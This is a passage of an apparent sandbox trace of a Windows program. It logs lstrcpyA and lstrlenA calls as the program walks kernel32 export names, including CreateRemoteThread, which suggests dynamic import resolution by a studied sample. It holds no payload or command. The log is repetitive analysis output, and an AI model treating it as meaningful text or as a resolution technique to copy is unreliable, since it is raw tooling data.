lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0079.551] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0079.551] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0079.551] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0079.551] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0079.551] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0079.551] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0079.551] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0079.551] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0079.551] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0079.551] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0079.551] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0079.551] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0079.551] lstrlenA (lpString="CANCELIO") returned 8 [0079.551] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0079.551] lstrlenA (lpString="CANCELIOEX") returned 10 [0079.551] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0079.551] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0079.551] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0079.551] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0079.551] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0079.551] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0079.551] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0079.551] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0079.552] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0079.552] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0079.552] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0079.552] lstrlenA (lpString="CHECKELEVATION") returned 14 [0079.552] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0079.552] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0079.552] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0079.552] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0079.552] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0079.552] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0079.552] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0079.552] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0079.552] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0079.552] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0079.552] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0079.552] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0079.552] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0079.552] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0079.552] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0079.552] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0079.552] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0079.552] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0079.552] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0079.552] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0079.552] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0079.552] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0079.552] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0079.552] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0079.552] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0079.552] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0079.552] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0079.552] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0079.552] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0079.552] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0079.552] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0079.552] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0079.553] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0079.553] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0079.553] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0079.553] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0079.553] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0079.553] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0079.553] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0079.553] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0079.553] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0079.553] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0079.553] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0079.553] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0079.553] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0079.553] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0079.553] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0079.553] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0079.553] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0079.553] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0079.553] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0079.553] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0079.553] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0079.553] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0079.553] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0079.553] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0079.553] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0079.553] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0079.553] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0079.553] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0079.553] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0079.553] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0079.553] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0079.553] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0079.553] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0079.553] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0079.553] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0079.553] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0079.554] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0079.554] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0079.554] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0079.554] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0079.554] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0079.554] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0079.554] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0079.554] lstrlenA (lpString="COPYCONTEXT") returned 11 [0079.554] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0079.554] lstrlenA (lpString="COPYFILEA") returned 9 [0079.554] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0079.554] lstrlenA (lpString="COPYFILEEXA") returned 11 [0079.554] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0079.554] lstrlenA (lpString="COPYFILEEXW") returned 11 [0079.554] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0079.554] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0079.554] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0079.554] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0079.554] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0079.554] lstrlenA (lpString="COPYFILEW") returned 9 [0079.554] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0079.554] lstrlenA (lpString="COPYLZFILE") returned 10 [0079.554] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0079.554] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0079.554] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0079.554] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0079.554] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0079.554] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0079.554] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0079.554] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0079.554] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0079.554] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0079.554] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0079.554] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0079.554] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0079.554] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0079.554] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0079.555] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0079.555] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0079.555] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0079.555] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0079.555] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0079.555] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0079.555] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0079.555] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0079.555] lstrlenA (lpString="CREATEEVENTA") returned 12 [0079.555] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0079.555] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0079.555] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0079.555] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0079.555] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0079.555] lstrlenA (lpString="CREATEEVENTW") returned 12 [0079.555] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0079.555] lstrlenA (lpString="CREATEFIBER") returned 11 [0079.555] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0079.555] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0079.555] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0079.555] lstrlenA (lpString="CREATEFILEA") returned 11 [0079.555] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0079.555] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0079.555] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0079.555] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0079.555] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0079.555] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0079.555] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0079.555] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0079.555] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0079.555] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0079.555] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0079.555] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0079.555] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0079.555] lstrlenA (lpString="CREATEFILEW") returned 11 [0079.556] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0079.556] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0079.556] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0079.556] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0079.556] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0079.556] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0079.556] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0079.556] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0079.556] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0079.556] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0079.556] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0079.556] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0079.556] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0079.556] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0079.556] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0079.556] lstrlenA (lpString="CREATEJOBSET") returned 12 [0079.556] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0079.556] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0079.556] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0079.556] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0079.556] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0079.556] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0079.557] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0079.557] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0079.557] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0079.557] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0079.557] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0079.557] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0079.557] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0079.557] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0079.557] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0079.557] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0079.557] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0079.557] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0079.557] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0079.557] lstrlenA (lpString="CREATEPIPE") returned 10 [0079.557] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0079.557] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0079.557] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0079.557] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0079.557] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0079.557] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0079.557] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0079.557] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0079.557] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0079.558] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0079.558] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0079.558] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0079.558] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0079.558] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0079.558] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0079.558] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0079.558] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0079.558] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0079.558] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0079.558] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0079.558] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0079.558] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0079.558] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0079.558] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0079.558] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0079.558] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0079.558] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0079.558] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0079.558] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0079.558] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0079.558] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0079.558] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0079.558] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0079.558] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0079.558] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0079.558] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0079.558] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0079.558] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0079.558] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0079.558] lstrlenA (lpString="CREATETHREAD") returned 12 [0079.558] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0079.558] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0079.558] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0079.558] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0079.558] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0079.559] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0079.559] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0079.559] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0079.559] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0079.559] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0079.559] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0079.559] lstrlenA 